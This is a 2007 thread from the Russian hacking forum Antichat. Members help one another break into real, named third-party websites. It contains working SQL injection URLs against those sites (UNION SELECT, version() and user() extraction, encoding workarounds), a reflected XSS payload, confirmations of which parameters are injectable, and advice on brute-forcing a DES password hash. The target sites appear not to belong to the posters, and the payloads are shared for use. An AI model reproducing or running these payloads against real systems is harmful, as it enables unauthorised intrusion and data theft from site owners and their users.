04.11.2007, 17:16
|
|
Новичок
Регистрация: 28.10.2007
Сообщений: 11
С нами:
9755907
Репутация:
12
|
|
Сообщение от Scipio
Это DES (13 симв)
Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?
|
|
|
04.11.2007, 17:20
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от HornetBlack
Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?
Онлайн незнаю, скорее их нет, а вот passwordpro 2.2.6 точно брутит
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 00:43
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
PHP код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =))
и еще
PHP код:
http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать?
и вот еще. что здесь?
PHP код:
http://www.atn-night-vision.com/news_page.php?id=-2%20union+select+1,2,3,4,5/*
аналогично
PHP код:
http://jdbasketball.com/news_page.php?id=14'
Последний раз редактировалось Piflit; 05.11.2007 в 00:58..
|
|
|
|
05.11.2007, 00:46
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от Piflit
PHP код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =)) http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,convert(version()+using+cp12 51),4/*
кодировка^
|
|
|
|
05.11.2007, 00:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Piflit
PHP код:
http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать? там скули нет, там пассивная XSS
Код:
http://www.haber20.net/news_page.php?m=1&id=2542%3Cscript%3Ealert(121212121)%3C/script%3E
насчет скули, наряду с вариантом ice1k`a возможен еще такой вариант:
Код:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 01:02
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
aes_decrypt(aes_encrypt(user(),0x71),0x71)
почему это прокатывает? это шифрование типа ксора?
|
|
|
|
05.11.2007, 02:31
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Piflit
aes_decrypt(aes_encrypt(user(),0x71),0x71)
почему это прокатывает? это шифрование типа ксора?
Нет, это шифрование типа AES, вернее точно AES...
получается так, что ты шифруешь данные user() (функция aes_encrypt() ) с ключем 0x71, а потом сразуже расшифровываешь то что зашифровал(функция aes_decrypt() ) c этим же ключем, и в используемой кодировке
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 04:18
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
у меня еще несколько вопросов.
1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
тут просто ошибка скрипта, а скуля нет, так?
2. когда надо ставить перед значением параметра минус, а когда кавычку после?
3. что можно сделать, кроме брута, если версия бд меньше 5?
ЗЫ пост http://forum.antichat.ru/showpost.php?p=497322&postcount=251 все еще актуален =)
|
|
|
|
05.11.2007, 04:33
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Сообщение от Piflit
у меня еще несколько вопросов.
1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
тут просто ошибка скрипта, а скуля нет, так?
с чего ты взял? здесь сто процентная иньекция -
Код:
http://www.wolfpublishers.nl/us/news.php?id=15+union+select+1,2,convert(version()+using+latin1),4,5,6/*
2. когда надо ставить перед значением параметра минус, а когда кавычку после?
Минус ставиться для перехода к несуществующим значениям переменной, делаеться в тех случях когда при правельном запросе возвращаеться исходная страница и не видно принтабельных столбцов ( можно перейти не только с помощью минуса но и влепить слишком большое значие e.x =999999+union..
3. что можно сделать, кроме брута, если версия бд меньше 5?
Что ты подрузомеваешь под брутом, если перебор действительных значений таблиц и колонок то да
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
05.11.2007, 14:12
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
http://www.hackzona.ru/hz.php?name=F...wtopic&t=14033
при этом запросе хакзона пишет
PHP код:
Общая ошибка
Could not obtain user vote data for this topic
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4
SELECT vote_id FROM voov_bbvote_voters WHERE vote_id = 331 AND vote_user_id =
Line : 747
File : /usr/home/www/a11/modules/Forums/viewtopic.php
это скуль?, если да то в каком параметре он?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
